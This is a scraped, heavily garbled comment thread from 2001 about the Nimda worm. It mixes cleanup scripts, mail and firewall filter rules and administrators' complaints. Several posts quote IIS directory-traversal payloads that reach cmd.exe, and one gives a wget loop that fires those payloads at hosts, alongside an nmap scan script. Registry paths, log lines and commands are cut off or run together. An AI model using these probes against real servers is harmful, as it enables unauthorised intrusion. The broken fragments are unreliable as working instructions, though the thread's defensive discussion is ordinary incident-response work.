\ Cu rrentVersion\Network\LanMan\L$]
\ Cu rrentVersion\Network\LanMan\M$]
\ Cu rrentVersion\Network\LanMan\N$]
\ Cu rrentVersion\Network\LanMan\O$]
\ Cu rrentVersion\Network\LanMan\P$]
\ Cu rrentVersion\Network\LanMan\Q$]
\ Cu rrentVersion\Network\LanMan\R$]
\ Cu rrentVersion\Network\LanMan\S$]
\ Cu rrentVersion\Network\LanMan\T$]
\ Cu rrentVersion\Network\LanMan\U$]
\ Cu rrentVersion\Network\LanMan\V$]
\ Cu rrentVersion\Network\LanMan\W$]
\ Cu rrentVersion\Network\LanMan\X$]
\ Cu rrentVersion\Network\LanMan\Y$]
\ Cu rrentVersion\Network\LanMan\Z$]
You'll one of the above (McAfee seems slightly better at the moment) and the patches from Billy.
You'll also need the AV.BAT and AV.REG files which I've cut'n'pasted below.
Finally, you'll need some sort of DOS executable version of SED. Search on Google or use what you have lying around or do whatever. If you don't have a lot of machines you could replace the SED line with an "edit etc..." statement and do that bit manually.
First, unplug the machine's network connection.
Start in Safe mode command prompt only (NT 4.x can just do this at the command prompt). Run the batch file (LOOK AT IT AND THE
Come back up in Windows Safe mode (NT 4.x just stay where you are, do NOT reboot.)
Run the CAI or McAfee to kill all the bogus files. You can alternatively search on *.nws, *.eml, *.dll, *.exe and mpe*.* modified in the last (1) day and delete them manually (be observant here, remember what you might have done yourself).
Note that if the executable infection was successful (it usually isn't) then the McAfee is the best choice here as you'll be reinstalling a bunch of apps otherwise
Now run the AV.BAT again.
Reboot.
Search as per above to be sure you're clean.
Apply patches rebooting as necessary.
Reattach the network connection and GO GET THE REST OF THE UPDATES YOUR SORRY ASS IS SURELY LACKING!
:)
AV.BAT:
=======
attrib -s -h -r %windir%\system\load.exe
echo Y | del %windir%\system\load.exe
rem attrib -s -h -r %windir%\system\riched20.dll
rem echo Y | del %windir%\system\riched20.dll
attrib -s -h -r %windir%\wininit.ini
echo Y | del %windir%\wininit.ini
attrib -s -h -r %temp%\mep*.*
echo Y | del %temp%\mep*.*
regedit a:\av.reg
a:\SED "s/shell=explorer.exe load.exe -dontrunold/shell=explorer.exe/" %windir%\s2.ini
attrib -s -h -r %windir%\system.ini
echo Y | del %windir%\system.ini
copy %windir%\s2.ini %windir%\system.ini
del %windir%\s2.ini
net user guest
net localgroup administrators guest
AV.REG:
=======
REGEDIT4
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
[-HKEY_LOCAL_MACHINE\Software\Microsoft\Windows
I'm not going to question that you got this from wget, but what I'm wondering is, how did you find all that out using wget? Perhaps I'm not as familiar with this utility as I should be?
... somebody that knows how to properly spell that word that refers to the lower-backside orifice!! Congrats, Taco.
This page was generated by a Cockpit full of Suicidal Middle Eastern Fanatics.
Wietese Venema, the main developer of Postfix (you know, the wonderful
/etc/postfix/main.cf:
/etc/postfix/body_checks:
/^[SPACE TAB]*name=.*\.exe/ REJECT
sendmail replacement that Redhat is removing from Redhat 7.2) posted this
to the postfix list:
-----------
There's a new worm hammering networks via email, via open shares,
and via vulnerable web servers.
Propagation via email can be stopped with:
body_checks = regexp:/etc/postfix/body_checks
Inside the [] are one space and one tab.
This is also a reminder that Postfix needs decent MIME parsing
support so it can filter this sort of malware more effectively.
Wietse
The worm's MIME headers, with spaces inserted to avoid false alarms.
- - = = = = _ A B C 1 2 3 4 5 6 7 8 9 0 D E F _ = = = =
C o n t e n t - T y p e : m u l t i p a r t / a l t e r n a t i v e ;
b o u n d a r y = " = = = = _ A B C 0 9 8 7 6 5 4 3 2 1 D E F _ = = = = "
- - = = = = _ A B C 0 9 8 7 6 5 4 3 2 1 D E F _ = = = =
C o n t e n t - T y p e : t e x t / h t m l ;
c h a r s e t = " i s o - 8 8 5 9 - 1 "
C o n t e n t - T r a n s f e r - E n c o d i n g : q u o t e d - p r i n t a b l e
< H T M L > < H E A D > < / H E A D > < B O D Y b g C o l o r = 3 D # f f f f f f > < i f r a m e s r c = 3 D c i d : E A 4 D M G B P 9 p h e i g h t = 3 D 0 w i d t h = 3 D 0 > < / i f r a m e > < / B O D Y > < / H T M L > - - = = = = _ A B C 0 9 8 7 6 5 4 3 2 1 D E F _ = = = = - -
- - = = = = _ A B C 1 2 3 4 5 6 7 8 9 0 D E F _ = = = =
C o n t e n t - T y p e : a u d i o / x - w a v ;
n a m e = " r e a d m e . e x e "
C o n t e n t - T r a n s f e r - E n c o d i n g : b a s e 6 4
C o n t e n t - I D : < E A 4 D M G B P 9 p >
RFC1925
The last time there was a widespread Unix worm was the days of the Morris worm. That was more than ten years ago - an eon in Internet time. Since then, the dangers of buffer overrun exploits have been well documented, and bugs of this sort have been fixed and are continually being fixed. MS is merely a johnny come lately to this game, and it looks like Johnny didn't bother to learn from those that came before him.
the interesting thing ist, that are are many similar requests, and it looks like someone trying to infect my server with different syntaxes (with some kind of script as the requests are fast one after another). My Server is a WinNT 4.0 box with IBM WebSphere (thats Apache), so it should not be affected by the usual IIS holes, but the attacker probably couldn't know that...
Here's the relevant part from my error_log (I substituted the document-root and script-root with DR and SR for obvious reasons), btw: the time is GMT+1 (mid-europe): /cmd.exet /system32/cmd.exe /cmd.exet /system32/cmd.exe/ system32/cmd.exem d.exet em32/cmd.exem d.exet em32/cmd.exem d.exes ystem32/cmd.exex ex e. exex e. exe
[Thu Aug 30 15:18:00 2001] File does not exist: (DR)/scripts/..ü~@~@~@~@/winnt/system32/cmd.exe
[Thu Aug 30 15:18:00 2001] File does not exist: (DR)/scripts/..ø~@~@~@/winnt/system32/cmd.exe
[Thu Aug 30 15:18:01 2001] File does not exist: (DR)/scripts/..ð~@~@/winnt/system32/cmd.exe
[Thu Aug 30 15:18:01 2001] File does not exist: (DR)/scripts/..à~@/winnt/system32/cmd.exe
[Thu Aug 30 15:18:01 2001] File does not exist: (DR)/iisadmpwd/..À..À..À..À..À/winnt/system32
[Thu Aug 30 15:18:01 2001] File does not exist: (DR)/scripts/..à~@/..à~@/..à~@/winnt/system32/c md.exe
[Thu Aug 30 15:18:01 2001] File does not exist: (DR)/iisadmpwd/..%2f..%2f..%2f..%2f..%2f..%2fwinn
[Thu Aug 30 15:18:02 2001] File does not exist: (DR)/scripts/..Á/winnt/system32/cmd.exe
[Thu Aug 30 15:18:02 2001] (2)No such file or directory: script not found or unable to stat: (SR)/cgi-bin//..%5c..%5c..%5c..%5c..%5c..%5cwinnt
[Thu Aug 30 15:18:02 2001] File does not exist: (DR)/scripts/..Á~\/winnt/system32/cmd.exe
[Thu Aug 30 15:18:02 2001] File does not exist: (DR)/adsamples/..À..À..À..À..À/winnt/system32
[Thu Aug 30 15:18:02 2001] File does not exist: (DR)/scripts/..Á~\/winnt/system32/cmd.exe
[Thu Aug 30 15:18:03 2001] File does not exist: (DR)/adsamples/..%5c..%5c..%5c..%5c..%5c..%5cwinn
[Thu Aug 30 15:18:03 2001] File does not exist: (DR)/scripts/..Á~\/winnt/system32/cmd.exe
[Thu Aug 30 15:18:03 2001] File does not exist: (DR)/_vti_cnf/..À..À..À..À..À/winnt/system32/ cmd.exe
[Thu Aug 30 15:18:03 2001] File does not exist: (DR)/_vti_cnf/..%5c..%5c..%5c..%5c..%5c..%5cwinnt
[Thu Aug 30 15:18:03 2001] File does not exist: (DR)/scripts/..Á~\..Á~\..Á~\..Á~\winnt/system32/c
[Thu Aug 30 15:18:03 2001] File does not exist: (DR)/_vti_bin/..À/..À/..À/winnt/system32/cmd.ex e
[Thu Aug 30 15:18:04 2001] File does not exist: (DR)/_vti_bin/..À/..À/..À/winnt/system32/cmd.ex e
[Thu Aug 30 15:18:04 2001] File does not exist: (DR)/_vti_bin/..À..À..À..À..À/winnt/system32/ cmd.exe
[Thu Aug 30 15:18:04 2001] File does not exist: (DR)/scripts/..Á^\/winnt/system32/cmd.exe
[Thu Aug 30 15:18:04 2001] File does not exist: (DR)/_vti_bin/..%5c..%5c..%5c..%5c..%5c/winnt/sys
[Thu Aug 30 15:18:04 2001] File does not exist: (DR)/scripts/..Á^\..Á^\..Á^\..Á^\winnt/system32/c
[Thu Aug 30 15:18:05 2001] File does not exist: (DR)/_vti_bin/..%5c..%5c..%5c..%5c..%5c/winnt/sys
[Thu Aug 30 15:18:06 2001] File does not exist: (DR)/scripts/..À/winnt/system32/cmd.exe
[Thu Aug 30 15:18:06 2001] File does not exist: (DR)/scripts/..À..À..À..Àwinnt/system32/cmd.ex e
[Thu Aug 30 15:18:06 2001] File does not exist: (DR)/scripts/..À..À..À..À/winnt/system32/cmd.e xe
[Thu Aug 30 15:18:07 2001] File does not exist: (DR)/scripts/..%5c..%5cwinnt/system32/cmd.exe
[Thu Aug 30 15:18:08 2001] File does not exist: (DR)/scripts/..%2f..%2f..%2f..%2fwinnt/system32/c
[Thu Aug 30 15:18:08 2001] File does not exist: (DR)/scripts..á~\/winnt/system32/cmd.exe
[Thu Aug 30 15:18:09 2001] File does not exist: (DR)/samples/..À..À..À..À..À/winnt/system32/c md.exe
[Thu Aug 30 15:18:09 2001] File does not exist: (DR)/samples/..%5c..%5c..%5c..%5c..%5c..%5cwinnt/
[Thu Aug 30 15:18:10 2001] File does not exist: (DR)/rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe
[Thu Aug 30 15:18:10 2001] File does not exist: (DR)/rpc/..%5c..%5c..%5cwinnt/system32/cmd.exe
[Thu Aug 30 15:18:11 2001] File does not exist: (DR)/pbserver/..%5c..%5c..%5cwinnt/system32/cmd.e
[Thu Aug 30 15:18:12 2001] File does not exist: (DR)/à/~@/à/~@/à/~@//winnt/system32/cmd.exe/
[Thu Aug 30 15:18:12 2001] File does not exist: (DR)/à/~@/à/~@/à/~@//winnt/system32/cmd.exe
[Thu Aug 30 15:18:13 2001] File does not exist: (DR)/msadc/..À/..À/..À/winnt/system32/cmd.exe
[Thu Aug 30 15:18:13 2001] File does not exist: (DR)/msadc/..%5c/..%5c/..%5c/winnt/system32/cmd.e
[Thu Aug 30 15:18:13 2001] File does not exist: (DR)/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd
[Thu Aug 30 15:18:14 2001] File does not exist: (DR)/msadc/..%5c/..%5c/..%5c/winnt/system32/cmd.e
[Thu Aug 30 15:18:14 2001] File does not exist: (DR)/msadc/..%5c..%5c..%5c..%5cwinnt/system32/cmd
Does someone have an explanation?
ms
Here are the log-entries:
mail.worcestercs.org - - [12/Jul/2001:03:39:40 +0200] "GET /scripts/..%255c..%255cwinnt/system32/cmd.exe?/c+d ir+c:%5C HTTP/1.0" 404 2004 "-" "libwww-perl/5.45" /msadc/..%255c../..%255c../..%255c../winnt/system3 2/cmd.exe?/c+dir+c:%5C HTTP/1.0" 404 2004 "-" "libwww-perl/5.45" /_vti_bin/..%5c..%5c..%5c..%5c..%5c../winnt/system 32/cmd.exe?/c+dir+c:%5C HTTP/1.0" 404 2004 "-" "libwww-perl/5.45"
mail.worcestercs.org - - [12/Jul/2001:03:39:42 +0200] "GET
mail.worcestercs.org - - [12/Jul/2001:03:39:43 +0200] "GET
ms
Go to the link in the update in the article. But some of the above still applies for automation...
All the problems that this thing tries to exploit, both in IIS, and OE/IE, have had patches issued by microsoft, and put up on the Windows Update page as critical security updates, for months now! The patch to fix the OE malformed mime problem has been there since May I believe. The problem isn't microsoft's security awareness, they've fixed the problem in a timely fashion. The problem is that most microsoft product users are complete idiots and probably don't even know what a "patch" is.
And yet we have 1000+ comments here on slashdot ranting about how evil and bad microsoft is, how windows is sooo insecure and isn't a "real" os, how we should sue microsoft for all the negligence of having an insecure product, how microsoft doesn't seem to care at all about security etc etc.... Whereas In the Linux world, once there's a patch available for a security problem, the whole thing is over and done with! Double Standard!?
I have just tried to "slow" or stop this worm from hitting our servers but it appears to be basically a brute force worm. Can anyone provide information with what to send to it to tell you "I have the virus" or similar so the same web server won't keep knocking on the door. Currently about 50 IPs addresses are continually requesting different URLs.
My action was to add the following ".htaccess" file (for Apache):
--- RewriteEngine On RewriteRule ^c/.* nimda.phtml [L] RewriteRule ^d/.* nimda.phtml [L] RewriteRule ^MSADC/.* nimda.phtml [L] RewriteRule ^msadc/.* nimda.phtml [L] RewriteRule ^_mem_bin/.* nimda.phtml [L] RewriteRule ^_vti_bin/.* nimda.phtml [L] RewriteRule ^var/.* nimda.phtml [L] RewriteRule ^default.ida.* nimda.phtml [L] RewriteRule nimda.phtml nimda.phtml [L] ---with the script "nimda.phtml" (actually called #$%&Off.phtml) looking like this:
--- ---This seems to slow the virus but probably only delays it a little. It does not appear to operate sequentially (I haven't timed/tested).
Basically I'm looking for a way to reduce the network traffic. Even turning the web server off will still incur the cost of the traffic?
Wil
--
http://bd4.amristar.com.au/ (online game)
uups,
sorry, this wasn't meant to say that wget did all that - it just showed the MIME-type.
The rest was leeched from different sources (my log files, ntbugtraq etc.)
I just wanted to quickly get the word out that disabling playing sounds in IE is not enough.
I do not think it is ethical that microsoft is allowed, as a corporation to release insecure software over and over. I mean, you'd think that once they figured out that it was insecure, they'd fix it next go-round, right? Yeah, well....
What i was trying to bring to people's minds for a second is that this might not be the fault of the programmers, but of the administration. For example: When's the next major dot release of the linux kernel comming out? No one knows for sure, cause technically no one's up against a deadline, as a generalized statement about open source. When no one is paying you to write code, you get it done when you get it done, and done right. When someone is paying your paycheck and matching your 401k, you get it done when they want it done, tested or not. I mean, it may have a hole, but you gotta feed your kids, right?
So what i just want people to be careful about is not to say that M$ programming sucks, or that they employ lazy programmers, or that they don't have any idea what they're doing. Their instructions are "get it done, and make it pretty, and get it done two days ago".
sig?
Basically we can't do anything since an traffic which gets to us has already passed through our ISP and been changed for. Unless we can "pretend to be infected" and stop attacks there's no point. Anyway, ...
I added a php script (formatted out of last message) which logs the IP and hostname and does a bit of a sleep before returning a message). Of the IP addresses all except one (about 100 so far) started with 208. This one was 210.212.130.7 which we traced back through to India. Interestingly this machine was one of the few which was not itself infected (i.e. the web server returned forbiddens and 404 on the home page as opposed to the others which either gave cookies and were obviously in a crappy state or had been brought down).
We've since seen a 38.165.144.38 (onetooneinteractive.com) which doesn't begin with a 208 so I guess the worm tends to pick IPs "close" but every now and again chooses one far away. Either way our traces through Indian ISPs and similar looking IPs to www.pak.gov.pk didn't yield anything conclusive :)
Let's hope the FBI's as thorough before someone starts launching missiles,
Wil
--
http://bd4.amristar.com.au/
That's silly. Do you really think that a worm will do anything with the HTTP-headers it receives in the answer? The worm connects, does a GET and sends more junk, but no way it listens to a "Redirect:" header.
my other sig is a 500 page novel
I know that
SP2 also protects against the server vulnerabilty, though it isn't spelled out where everyone is being directed by Microsoft or the AV/News Companies. So if you have uped to SP2, the IIS issue is not a problem
For this info, go to
Protect Your Computers From the Nimda Worm
at Microsoft's site
---"What did I say that sounded like 'Tell me about your day?'"---
Like all warts, you just keep squeezing until it pops
Live today. Tomorrow will cost a lot more!
We got slamed at 12.27am EST in Melb. I unplugged the outside of our firewall then put a packetshaper b/n our firewall and the net. I got the top talkers on HTTP and if they were in our DHCP range (AKA end users on W2K and thus infected) did a ndtstat -A to see who they were and get the mac address. Jumped on the cisco switch and did a show cam then disabled the port. Spent must of the day re-imaging PCs. We will drop all external HTTP except via the proxy (should have cracked down on that ages ago anyway) and kill all outgoing devices that pop up sending directly out. Hope this will help stop this crap !
Did the patches (right way I hope) and updated the virus def files. Chose to stay off line till tomorrow.
Good luck folks
[This space is NotForRent]
this exploit really only hits Windows boxes running IIS that haven't been properly patched?
Hmm... sounds like an administrator error.
*SHRUG*
Codifex Maximus ~ In search of... a shorter sig.
to install another browser automaticly? Instead of launching the readme.exe, run the installer for Opera or Mozilla or Netscape or even a patched version of IE (or just run the patch for the vulnerability)?
the client side exploit (OE) has been known since march (with info on how to disable the feature it exploits), and there's been a patch since may http://www.microsoft.com/technet/treeview/default. asp?url=/technet/security/bulletin/MS01-020.asp
all these patches were widely visible on windows update at critical updates. I had already installed the patch, and couldn't figure out why all these demos of the vunerability didn't work.
all the linux zealots can shut the hell up now.
IIS patch to fix this problem was out on windows update almost a year ago.
Fix for OE was out several months ago, also on windows update.
How is this microsoft's fault? It's dumb administrators is what it is.
mmc.exe is the root of the problem. you can't delete it because it's in-process, up to 4 times. rename the file to something completely different, no "mmc" string in there, use m1m2c3_baaaaad.AeBxCe if you have to. reboot immediately. this iwll stop the network bashing, and allow you to start plucking out the damage and sew it up...
I'm figuring that it came in via the README.EXE attachments that a few people received, and one of them ran it.
Has anyone figured out a way to track down where it started?
Where I work we have a ton of machines behind a 3640 running NAT. When ever one of these worms pops up the NAT tables fill and the router crawls. I've done a few things to keep the router from doing a complete face plant. The main thing is to enable CEF instead of using process switching (ip cef in global config mode) when used in conjunction with "service nagle" the router can do some effecient packet switching. Even with these preventative measures the router still slowed to almoost a stand still yesterday, at which point I used an access list to filter out all web traffic coming from our internal network destined for the internet. We could browse the web internally by using https://www.safeweb.com/ and email and web requests from the internet functioned better. This is because these worms open tens of connections per second and the router has to add a NAT entry for each attempted connection. Multiply that by 70 infected servers and that's a problem. Especially because many requests aren't responded to and have to be aged out of the NAT tables. To flush the NAT tables use "clear ip nat trans *" and your router will function fine long enough to put an access list on it :) Finally one last good idea is to black hole any private address space your not using because these worms will attempt to send packets to subnets that don't exist. For example: If your using 192.168.1.1/24 the worm might try to open a request to 192.168.3.66. This packet might get stuck in a routing loop needlessly tying up resources you really need. The solution is to "ip route 192.168.0.0 255.255.0.0 null0". This will drop any packets destined for unused subnets in the bit bucket where they won't bother you.
*nix is not that hard to learn and quite frankly has a lot more abilities than the MS equivalents. And it's mainly all free. In light of what's been going on lately it's almost unpatriotic to run MS servers anymore because they are so vulnerable to attacks. IMHO.
Maybe it's a good thing that this sucker uses so many attack methods, fixing an infected machine (or a threatened one) will close a lot of security holes all at once. It's better than having 6 different incidents and fixing the holes one at a time.
:)
It would be amusing to see a worm running around patching security holes
- - You can't take something off the Internet! That's like trying to take pee out of a swimming pool.
To check for a host like Nimda would (vulnerable):
r
y stem32/cmd.exe?/c+dir
y stem32/cmd.exe?/c+dir
. %c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir
i r
i r
i r
i r
i r
d ir
r
c +dir
r
check:
while read req junk; do
wget -T 5 -O - -q "$1$req" | awk '{print ip " " req " " $0}' ip=$1 req=$req
done < check.list
check.list:
/scripts/root.exe?/c+dir
/MSADC/root.exe?/c+dir
/c/winnt/system32/cmd.exe?/c+dir
/d/winnt/system32/cmd.exe?/c+dir
/scripts/..%255c../winnt/system32/cmd.exe?/c+di
/_vti_bin/..%255c../..%255c../..%255c../winnt/s
/_mem_bin/..%255c../..%255c../..%255c../winnt/s
/msadc/..%255c../..%255c../..%255c/..%c1%1c../.
/scripts/..%c1%1c../winnt/system32/cmd.exe?/c+d
/scripts/..%c0%2f../winnt/system32/cmd.exe?/c+d
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+d
/scripts/..%c0%af../winnt/system32/cmd.exe?/c+d
/scripts/..%c1%9c../winnt/system32/cmd.exe?/c+d
/scripts/..%%35%63../winnt/system32/cmd.exe?/c+
/scripts/..%%35c../winnt/system32/cmd.exe?/c+di
/scripts/..%25%35%63../winnt/system32/cmd.exe?/
/scripts/..%252f../winnt/system32/cmd.exe?/c+di
/c/winnt/system32/cmd.exe+/c+net%20send%20bla
To list hosts with ports 80 and 443 available:
scan:
while read network logfile junk; do
echo -n "Net:$network Log:$logfile " &&
nmap -q -sT -p 80,443 -T5 -n $network -oG $logfile && echo Ok || echo Failed
done < scan.list
scan.list:
192.168.1.* 192.168.1
Slightly useful..
Quote:
:)
The worm has a copyright text string that is never displayed:
Concept Virus(CV) V.5, Copyright©2001 R.P.China
UnQuote
from http://www.f-secure.com/v-descs/nimda.shtml
I guess that all the anti-virus makers have violated the DCMA!
No one should think that things would be so much better (from a security standpoint) if we would all run UNIX. Go over to Bugtraq and check out how many known exploits there are against your faviorite UNIX platform. I checked a week or so ago and there were about 40 known vulnerabilities for Windows 2000 plus IIS and about 40 for Sun plus Netscape Enterprise.
I agree that Microsoft could do more to stop this crap, but, for some time now, they have been quick to issue fixes for these things.
The real issue is twofold:
1. The patches are there to stop these attacks, but system administrators are not even close to staying up to date. This is due to overwork, laziness, fear of introducing new problems and corporate policies.
2. Windows is very popular and therfore the target of attack. If all of those using Windows on the Internet were to switch to Linux, then the attackers would start writing more attacks for Linux and they would get more publicity.
The grass is not (much) greener on the other side.
Tod
Bandwidth went down after applying this.
/system32/ http://support.microsoft.com
/d/^*\.(exe|dll).* http://support.microsoft.com
/c/^*\.(exe|dll).* http://support.microsoft.com
/scripts/^.*\.(exe|dll).* http://support.microsoft.com
/MSADC/ http://support.microsoft.com
/msadc/ http://support.microsoft.com
/scripts/ http://support.microsoft.com
/default.ida http://support.microsoft.com
srm.conf ==> on redhat 6.x servers
httpd.conf ==> on redhat 7.x servers
Make sure you turn Host Name Lookups off from the on position, this will speed up the dns and page downloads alot
HostnameLookups Off ==> this should be Off
Then add the following lines right under the error code lines in either srm or httpd depending which os you have
####Redirect this Nimda Worm ### Written by Brian Fairchild (www.amhosting.com)
RedirectMatch
Redirect
Redirect
Redirect
RedirectMatch
RedirectMatch
Redirect
RedirectMatch ^.root\.(exe).* http://support.microsoft.com
RedirectMatch ^.cmd\.(exe).* http://support.microsoft.com
RedirectMatch
#RedirectMatch ^.*\.(exe|dll).* http://support.microsoft.com
####Redirect this Nimda Worm ### Written by Brian Fairchild
I'm not that informed, but two simple Debian lines are not too much to ask of anyone. First, remove the little # marks from /etc/apt/sources.list, then :>
apt-get upgrade
apt-get update
Bango, you've got upgrades and "patches".
Red Hat has a more mousey web based upgrade system that will work on one machine without fee. Just go visit their web site and look for support. With a little effort, you can learn how to use RPM and gnoRPM (?). Try "info rpm" or "man rpm" at a bash prompt, that tv with a foot on it called gnome terminal.
There you go. That's nicer than being laughed at, isn't it?
Friends don't help friends install M$ junk.
im starting a virus zoo :)
(j/k)!
Tragek
According to incidents.org --
The worm contains a copyright string embedded in its executable:
Concept Virus(CV) V.5, Copyright(C)2001 R.P.China
Great. Not only do you have to clean your machine, but you're automatically in violation of the DMCA.
Mod Karma -1: I sed bad wurds. If I cep my mouf shut, I wud be at riyses.
While this may only be relevant to a small number of people, anyone with Linux 2.4.0 upwards and ip-tables / netfilter can use the string match to DROP any packets with the signature of these worms.
iptables -I INPUT -i eth0 -p tcp --tcp-flags ACK,PSH ACK,PSH --dport 80 \
-m string --string '/default.ida?' -j REJECT
--reject-with tcp-reset
will handle code red I/II.
For NIMDA adjust the string accordingly.
(This is copied from a post in comp.os.linux.security by Ian Jones. He deserves the credit. I am just copying and pasting)
Ouch.
If you're going to go to a site that has a virus like this, should run lynx to do it on your Linux box. Or at least run lynx on Windows. Sure, it's annoying trying to read all these lousy graphics-intensive sites, but it's safe.
I haven't heard anyone point out what seems obvious: Nimda is Admin backwards
Is this just so clear that no one bothered to mention it or did this really slip by?
Due to the enormous spread of the Nimda Worm, we crated a Database of infected Hosts. Since this morning we do have more than 2000 possibly infected hosts in our database.
If you like to contribute to this Project, check for infected Hosts or use the Database for yourself, feel free to have a look at http://home.jungnickel.com/nimda.php
If you already collected a lot of infected IP-Adresses, you may also send this list as a contribution to nimda-submission@jungnickel.com
We'd like to thank anyone helping with this project in advance.
Sincerely Yours, Jan Jungnickel...not having played with this sort of thing before. (Red Hat)
What is your Slash Rating?
Alias
ErrorDocument 404
then, make a perl or php script of whatever that does a regular expression match in $REQUEST_URI variable (looking for cmd.exe) and adds an iptables or ipchains entry for $REMOTE_HOST variable.
that way at least you won't get repeat attacks from the same host and save some bandwidth
--- sig moved for great justice.
Outlook Express 7.0 can prevent spread also.
Tools -> Options -> Security -> check "Do not allow to send or receive any mail on this machine"
MOD THE CHILD UP!
I made a copy of the log on 2001-09-19T2019GMT-6 (about 36 hours later), deleted any portions of the log prior to the latest round of probes starting at:
/home/groups/home/web/MSADC/root.exe
... this attack is definitely hitting me more than Code Red.
[Tue Sep 18 08:17:26 2001] [error] [client 216.254.80.145] File does not exist:
And then ran some basic numbers
[/tmp]# grep -i root.exe error | wc -l
1433
[/tmp]# grep -i msadc error | wc -l
1159
[/tmp]# grep -i '../winnt' error | wc -l
4827
[/tmp]# grep -i 'vti' error | wc -l
525
[/tmp]# grep -i 'default.ida' error | wc -l
21
It is more productive to voice thoughtful opinions (reply) than to judge (moderate) others.
test
Is there somewhere we can download this script? I can not get it to work on my system, and would like to know the count from my firewall so far.
Thanks
Can anyone direct me to a web page that has a history of all these microsoft specific exploits?
Their dates and specifics about the scale of damage they caused would be nice.
Holes (Outlook virii, worms, etc) that would be usefulin presenting to pointy-hairs next time they start whining about free operating systems being 'too risky' etc.
Someone needs to make such a web page if there isn't one already.
The "confirm after download" problem with office files has been known for a while now, microsoft has a tool to silently enable the "confirm after download" option on office files
(1) My mother's boss left her a voice mail first thing Wednesday morning telling her not to even turn on her computer. She still hasn't been given the green light. My mother is a loan officer for a big, unique US financial institution with thousands of employees. She was told to call anyone who might be trying to reach her via email and tell them that her personal email was down. Wednesday evening she was told that all the computers had to be returned to IT and re-imaged before use.
;) Wednesday morning. It bounced. I called him,
(2) I am refinancing my house right now, and sent an email to my loan officer (not related to me
and he said "Oh yeah, we're switching ISPs or something, and it just hasn't recognized the new ISP yet." Right.
(3) One of my clients, a really-big financial institution, shut down pretty much everything on Tuesday evening and were down all day Wednesday.
--
"Very many American lives have been lost. Always we will remember the
character of the onslaught against us. No matter how long it may take
us to overcome this premeditated invasion, the American people in their
righteous might will win through to absolute victory." -- Franklin
Delano Roosevelt, December 8, 1941
You are right, this thing is an utter bitch in terms of infection rate, it's more or less taken down all our unpatched servers here (d'oh!) and shut down our external email for a day. However, it doesn't seem to be making too much damage apart from taking up bandwidth and CPU time and increasing log size.
I'm getting really paranoid. Could it be that it may be going for a denial of service attack, like Code Red?like your suggestion.. little more help.. what is qtrain? where can i find it?
Yes, but netscape gave you the option to turn it off.